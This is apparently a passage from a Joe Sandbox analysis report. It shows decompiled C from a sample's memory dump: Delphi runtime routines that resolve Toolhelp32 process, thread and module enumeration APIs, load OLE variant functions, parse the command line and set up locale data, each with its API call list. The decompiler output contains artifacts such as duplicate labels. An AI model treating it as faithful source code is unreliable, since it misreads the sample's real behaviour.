    						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
    						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
    						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
    						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
    						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
    					}
    				}
    				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
    					return 0;
    				} else {
    					return 1;
    				}
    			}




    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040CA40() {
    				struct HINSTANCE__* _v8;
    				intOrPtr _t46;
    				void* _t91;
    
    				_v8 = GetModuleHandleA("oleaut32.dll");
    				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
    				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
    				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
    				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
    				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
    				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
    				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
    				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
    				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
    				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
    				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
    				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
    				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
    				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
    				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
    				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
    				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
    				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
    				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
    				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
    				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
    				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
    				 *0x4547f4 = _t46;
    				return _t46;
    			}

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
    				char _t5;
    				char _t6;
    				CHAR* _t7;
    				char _t9;
    				CHAR* _t11;
    				char _t14;
    				CHAR* _t15;
    				char _t17;
    				CHAR* _t19;
    				CHAR* _t22;
    				CHAR* _t23;
    				CHAR* _t32;
    				intOrPtr _t33;
    				intOrPtr* _t34;
    				void* _t35;
    				void* _t36;
    
    				_t34 = __edx;
    				_t22 = __eax;
    				while(1) {
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L2:
    					_t5 =  *_t22;
    					if(_t5 != 0 && _t5 <= 0x20) {
    						_t22 = CharNextA(_t22);
    					}
    					L4:
    					if( *_t22 != 0x22 || _t22[1] != 0x22) {
    						_t36 = 0;
    						_t32 = _t22;
    						while(1) {
    							_t6 =  *_t22;
    							if(_t6 <= 0x20) {
    								break;
    							}
    							if(_t6 != 0x22) {
    								_t7 = CharNextA(_t22);
    								_t36 = _t36 + _t7 - _t22;
    								_t22 = _t7;
    								continue;
    							}
    							_t22 = CharNextA(_t22);
    							while(1) {
    								_t9 =  *_t22;
    								if(_t9 == 0 || _t9 == 0x22) {
    									break;
    								}
    								_t11 = CharNextA(_t22);
    								_t36 = _t36 + _t11 - _t22;
    								_t22 = _t11;
    							}
    							if( *_t22 != 0) {
    								_t22 = CharNextA(_t22);
    							}
    						}
    						E00404478(_t34, _t36);
    						_t23 = _t32;
    						_t33 =  *_t34;
    						_t35 = 0;
    						while(1) {
    							_t14 =  *_t23;
    							if(_t14 <= 0x20) {
    								break;
    							}
    							if(_t14 != 0x22) {
    								_t15 = CharNextA(_t23);
    								if(_t15 <= _t23) {
    									continue;
    								} else {
    									goto L27;
    								}
    								do {
    									L27:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t15 > _t23);
    								continue;
    							}
    							_t23 = CharNextA(_t23);
    							while(1) {
    								_t17 =  *_t23;
    								if(_t17 == 0 || _t17 == 0x22) {
    									break;
    								}
    								_t19 = CharNextA(_t23);
    								if(_t19 <= _t23) {
    									continue;
    								} else {
    									goto L21;
    								}
    								do {
    									L21:
    									 *((char*)(_t33 + _t35)) =  *_t23;
    									_t23 =  &(_t23[1]);
    									_t35 = _t35 + 1;
    								} while (_t19 > _t23);
    							}
    							if( *_t23 != 0) {
    								_t23 = CharNextA(_t23);
    							}
    						}
    						return _t23;
    					} else {
    						_t22 =  &(_t22[2]);
    						continue;
    					}
    				}
    			}

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
    				void _v1024;
    				char _v1088;
    				long _v1092;
    				void* _t12;
    				char* _t14;
    				intOrPtr _t16;
    				intOrPtr _t18;
    				intOrPtr _t24;
    				long _t32;
    
    				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
    				_t14 =  *0x45308c; // 0x454044
    				if( *_t14 == 0) {
    					_t16 =  *0x452f6c; // 0x405f30
    					_t9 = _t16 + 4; // 0xffe9
    					_t18 =  *0x454660; // 0x400000
    					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
    					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
    				}
    				_t24 =  *0x452f90; // 0x454214
    				E00402784(E00402A8C(_t24));
    				CharToOemA( &_v1024,  &_v1024);
    				_t32 = E00407764( &_v1024, __edi);
    				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
    				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
    			}

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E00401A74() {
    				void* _t2;
    				void* _t3;
    				void* _t14;
    				intOrPtr* _t19;
    				intOrPtr _t23;
    				intOrPtr _t26;
    				intOrPtr _t28;
    
    				_t26 = _t28;
    				if( *0x4545bc == 0) {
    					return _t2;
    				} else {
    					_push(_t26);
    					_push(E00401B4A);
    					_push( *[fs:edx]);
    					 *[fs:edx] = _t28;
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L0040130C();
    					}
    					 *0x4545bc = 0;
    					_t3 =  *0x45461c; // 0x0
    					LocalFree(_t3);
    					 *0x45461c = 0;
    					_t19 =  *0x4545e4; // 0x4545e4
    					while(_t19 != 0x4545e4) {
    						_t1 = _t19 + 8; // 0x0
    						VirtualFree( *_t1, 0, 0x8000);
    						_t19 =  *_t19;
    					}
    					E00401374(0x4545e4);
    					E00401374(0x4545f4);
    					E00401374(0x454620);
    					_t14 =  *0x4545dc; // 0x0
    					while(_t14 != 0) {
    						 *0x4545dc =  *_t14;
    						LocalFree(_t14);
    						_t14 =  *0x4545dc; // 0x0
    					}
    					_pop(_t23);
    					 *[fs:eax] = _t23;
    					_push(0x401b51);
    					if( *0x454045 != 0) {
    						_push(0x4545c4);
    						L00401314();
    					}
    					_push(0x4545c4);
    					L0040131C();
    					return 0;
    				}
    			}

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				char _v24;
    				char _v28;
    				char _v32;
    				char _v36;
    				char _v40;
    				char _v44;
    				char _v48;
    				char _v52;
    				char _v56;
    				char _v60;
    				char _v64;
    				char _v68;
    				void* _t104;
    				void* _t111;
    				void* _t133;
    				intOrPtr _t183;
    				intOrPtr _t193;
    				intOrPtr _t194;
    
    				_t191 = __esi;
    				_t190 = __edi;
    				_t193 = _t194;
    				_t133 = 8;
    				do {
    					_push(0);
    					_push(0);
    					_t133 = _t133 - 1;
    				} while (_t133 != 0);
    				_push(__ebx);
    				_push(_t193);
    				_push(0x40b7df);
    				_push( *[fs:eax]);
    				 *[fs:eax] = _t194;
    				E0040B3A0();
    				E00409E60(__ebx, __edi, __esi);
    				_t196 =  *0x454744;
    				if( *0x454744 != 0) {
    					E0040A038(__esi, _t196);
    				}
    				_t132 = GetThreadLocale();
    				E00409DB0(_t43, 0, 0x14,  &_v20);
    				E00403EDC(0x454678, _v20);
    				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
    				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
    				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
    				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
    				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
    				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
    				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
    				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
    				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
    				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
    				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
    				E00403EDC(0x454684, _v36);
    				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
    				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
    				E00403EDC(0x454688, _v44);
    				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
    				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
    				E00403EDC(0x454690, _v52);
    				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
    				E00403EDC(0x454694, _v56);
    				E00403E88( &_v12);
    				E00403E88( &_v16);
    				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
    				_t104 = E00407174(0x40b7f4, 0, _t196);
    				_t197 = _t104;
    				if(_t104 != 0) {
    					E00403F20( &_v8, 0x40b84c);
    				} else {
    					E00403F20( &_v8, 0x40b840);
    				}
    				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
    				_t111 = E00407174(0x40b7f4, 0, _t197);
    				_t198 = _t111;
    				if(_t111 == 0) {
    					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
    					if(E00407174(0x40b7f4, 0, _t198) != 0) {
    						E00403F20( &_v12, 0x40b868);
    					} else {
    						E00403F20( &_v16, 0x40b858);
    					}
    				}
    				_push(_v12);
    				_push(_v8);
    				_push(":mm");
    				_push(_v16);
    				E00404208();
    				_push(_v12);
    				_push(_v8);
    				_push(":mm:ss");
    				_push(_v16);
    				E00404208();
    				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
    				_pop(_t183);
    				 *[fs:eax] = _t183;
    				_push(E0040B7E6);
    				return E00403EAC( &_v68, 0x10);
    			}

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 00409E60: GetThreadLocale.KERNEL32(00000000,00409F73,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409E7C
    • GetThreadLocale.KERNEL32(00000000,0040B7DF,?,?,00000000,00000000), ref: 0040B54A
      • Part of subcall function 00409DB0: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
      • Part of subcall function 00409DFC: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
      • Part of subcall function 0040A0E8: GetThreadLocale.KERNEL32(?,00000000,0040A2B2,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A117
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(?,00000000,0040A0CF,?,?,00000000), ref: 0040A050
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000004,00000000,0040A0CF,?,?,00000000), ref: 0040A080
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009F84,00000000,00000000,00000004), ref: 0040A08B
      • Part of subcall function 0040A038: GetThreadLocale.KERNEL32(00000000,00000003,00000000,0040A0CF,?,?,00000000), ref: 0040A0A9
      • Part of subcall function 0040A038: EnumCalendarInfoA.KERNEL32(Function_00009FC0,00000000,00000000,00000003), ref: 0040A0B4
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 77%
    			E0040DBC0(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
    				char _v260;
    				char _v768;
    				char _v772;
    				short* _v776;
    				intOrPtr _v780;
    				char _v784;
    				signed int _v788;
    				signed short* _v792;
    				char _v796;
    				char _v800;
    				intOrPtr* _v804;
    				void* __ebp;
    				signed char _t47;
    				signed int _t54;
    				void* _t62;
    				intOrPtr* _t73;
    				intOrPtr* _t91;
    				void* _t93;
    				void* _t95;
    				void* _t98;
    				void* _t99;
    				intOrPtr* _t108;
    				void* _t112;
    				intOrPtr _t113;
    				char* _t114;
    				void* _t115;
    
    				_t100 = __ecx;
    				_v780 = __ecx;
    				_t91 = __edx;
    				_v776 = __eax;
    				if(( *(__edx + 1) & 0x00000020) == 0) {
    					E0040D7EC(0x80070057);
    				}
    				_t47 =  *_t91;
    				if((_t47 & 0x00000fff) != 0xc) {
    					_push(_t91);
    					_push(_v776);
    					L0040C5A0();
    					return E0040D7EC(_v776);
    				} else {
    					if((_t47 & 0x00000040) == 0) {
    						_v792 =  *((intOrPtr*)(_t91 + 8));
    					} else {
    						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
    					}
    					_v788 =  *_v792 & 0x0000ffff;
    					_t93 = _v788 - 1;
    					if(_t93 < 0) {
    						L9:
    						_push( &_v772);
    						_t54 = _v788;
    						_push(_t54);
    						_push(0xc);
    						L0040C9F4();
    						_t113 = _t54;
    						if(_t113 == 0) {
    							E0040D544(_t100);
    						}
    						E0040DB18(_v776);
    						 *_v776 = 0x200c;
    						 *((intOrPtr*)(_v776 + 8)) = _t113;
    						_t95 = _v788 - 1;
    						if(_t95 < 0) {
    							L14:
    							_t97 = _v788 - 1;
    							if(E0040DB34(_v788 - 1, _t115) != 0) {
    								L0040CA0C();
    								E0040D7EC(_v792);
    								L0040CA0C();
    								E0040D7EC( &_v260);
    								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
    							}
    							_t62 = E0040DB64(_t97, _t115);
    						} else {
    							_t98 = _t95 + 1;
    							_t73 =  &_v768;
    							_t108 =  &_v260;
    							do {
    								 *_t108 =  *_t73;
    								_t108 = _t108 + 4;
    								_t73 = _t73 + 8;
    								_t98 = _t98 - 1;
    							} while (_t98 != 0);
    							do {
    								goto L14;
    							} while (_t62 != 0);
    							return _t62;
    						}
    					} else {
    						_t99 = _t93 + 1;
    						_t112 = 0;
    						_t114 =  &_v772;
    						do {
    							_v804 = _t114;
    							_push(_v804 + 4);
    							_t18 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040C9FC();
    							E0040D7EC(_v792);
    							_push( &_v784);
    							_t21 = _t112 + 1; // 0x1
    							_push(_v792);
    							L0040CA04();
    							E0040D7EC(_v792);
    							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
    							_t112 = _t112 + 1;
    							_t114 = _t114 + 8;
    							_t99 = _t99 - 1;
    						} while (_t99 != 0);
    						goto L9;
    					}
    				}
    			}

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040DC59
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040DC75
    • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 0040DCAE
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DD2B
    • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 0040DD44
    • VariantCopy.OLEAUT32(?), ref: 0040DD79
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 79%
    			E00403C90(void* __ecx) {
    				long _v4;
    				int _t3;
    
    				if( *0x454044 == 0) {
    					if( *0x419030 == 0) {
    						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
    					}
    					return _t3;
    				} else {
    					if( *0x454218 == 0xd7b2 &&  *0x454220 > 0) {
    						 *0x454230();
    					}
    					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
    					return WriteFile(GetStdHandle(0xfffffff5), E00403D18, 2,  &_v4, 0);
    				}
    			}

    APIs
    • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000,00000000), ref: 00403CC9
    • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 00403CCF
    • GetStdHandle.KERNEL32(000000F5,00403D18,00000002,?,00000000,00000000,?,00403D5E,00000000,00000000,?,00000002,00403DFE,0040272B,00402773,00000000), ref: 00403CE4
    • WriteFile.KERNEL32(00000000,000000F5,00403D18,00000002,?), ref: 00403CEA
    • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 00403D08
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E0040B9A0() {
    				struct HINSTANCE__** _t2;
    				void* _t3;
    				struct HINSTANCE__** _t5;
    				struct HRSRC__* _t7;
    				struct HINSTANCE__** _t8;
    				intOrPtr* _t11;
    				intOrPtr* _t12;
    				struct HINSTANCE__* _t13;
    
    				_t2 =  *0x452f9c; // 0x45402c
    				if( *_t2 != 0) {
    					_t5 =  *0x452f9c; // 0x45402c
    					_t7 = FindResourceA( *_t5, "DVCLAL", 0xa);
    					_t8 =  *0x452f9c; // 0x45402c
    					return LoadResource( *_t8, _t7);
    				}
    				_t3 = 0;
    				_t11 =  *0x4530b8; // 0x419034
    				_t12 =  *_t11;
    				if(_t12 != 0) {
    					while(1) {
    						_t13 =  *(_t12 + 4);
    						_t3 = LoadResource(_t13, FindResourceA(_t13, "DVCLAL", 0xa));
    						if(_t3 != 0) {
    							goto L5;
    						}
    						_t12 =  *_t12;
    						if(_t12 != 0) {
    							continue;
    						}
    						goto L5;
    					}
    				}
    				L5:
    				return _t3;
    			}

    APIs
    • FindResourceA.KERNEL32(00400000,DVCLAL,0000000A), ref: 0040B9BC
    • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3), ref: 0040B9CA
    • FindResourceA.KERNEL32(?,DVCLAL,0000000A), ref: 0040B9EC
    • LoadResource.KERNEL32(?,00000000,?,00416F00,00000000,0040BA1A,?,?,?,00416F00,00000000,0040BA89,004171A3,00416F00,00000000,00417553), ref: 0040B9F3
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    C-Code - Quality: 100%
    			E00405945(void* __eax, void* __ebx, void* __ecx, intOrPtr* __edi) {
    				long _t11;
    				void* _t16;
    
    				_t16 = __ebx;
    				 *__edi =  *__edi + __ecx;
    				 *((intOrPtr*)(__eax - 0x4545b4)) =  *((intOrPtr*)(__eax - 0x4545b4)) + __eax - 0x4545b4;
    				 *0x419008 = 2;
    				 *0x454014 = 0x4011a8;
    				 *0x454018 = 0x4011b0;
    				 *0x454046 = 2;
    				 *0x454000 = E00404B04;
    				if(E00402F5C() != 0) {
    					_t3 = E00402F8C();
    				}
    				E00403050(_t3);
    				 *0x45404c = 0xd7b0;
    				 *0x454218 = 0xd7b0;
    				 *0x4543e4 = 0xd7b0;
    				 *0x45403c = GetCommandLineA();
    				 *0x454038 = E004012C0();
    				if((GetVersion() & 0x80000000) == 0x80000000) {
    					 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    				} else {
    					if((GetVersion() & 0x000000ff) <= 4) {
    						 *0x4545b8 = E0040587C(GetThreadLocale(), _t16, __eflags);
    					} else {
    						 *0x4545b8 = 3;
    					}
    				}
    				_t11 = GetCurrentThreadId();
    				 *0x454030 = _t11;
    				return _t11;
    			}

    APIs
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000000), ref: 00402F61
      • Part of subcall function 00402F5C: GetKeyboardType.USER32(00000001), ref: 00402F6D
    • GetCommandLineA.KERNEL32 ref: 004059AB
      • Part of subcall function 004012C0: GetStartupInfoA.KERNEL32 ref: 004012CA
    • GetVersion.KERNEL32 ref: 004059BF
    • GetVersion.KERNEL32 ref: 004059D0
    • GetThreadLocale.KERNEL32 ref: 004059EC
    • GetThreadLocale.KERNEL32 ref: 004059FD
      • Part of subcall function 0040587C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    • GetCurrentThreadId.KERNEL32 ref: 00405A0C
      • Part of subcall function 00402F8C: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FAE
      • Part of subcall function 00402F8C: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402FFD,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402FE1
